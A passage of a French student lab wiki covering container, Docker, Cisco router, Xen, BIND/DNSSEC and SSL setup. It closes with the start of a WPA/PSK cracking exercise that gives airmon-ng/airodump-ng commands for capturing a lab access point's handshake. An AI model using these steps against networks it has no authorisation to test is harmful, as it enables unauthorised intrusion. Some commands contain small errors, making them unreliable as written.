  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
